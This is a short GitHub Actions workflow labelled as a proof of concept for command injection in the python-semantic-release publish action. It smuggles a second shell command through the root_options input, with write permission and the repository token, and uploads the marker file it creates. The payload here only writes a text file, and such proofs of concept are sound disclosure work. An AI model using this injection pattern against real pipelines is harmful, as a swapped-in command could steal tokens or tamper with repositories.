name: PoC - eval injection

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest

    permissions:
      contents: write

    steps:
      - name: checkout
        uses: actions/checkout@v4

      - name: test injection
        uses: python-semantic-release/publish-action@v9.21.1
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          root_options: "-h; echo 'INJECTED COMMAND EXECUTED' > injected.txt; echo "
      
      - name: upload other artifact
        uses: actions/upload-artifact@v4
        with:
          name: injected-output
          path: injected.txt
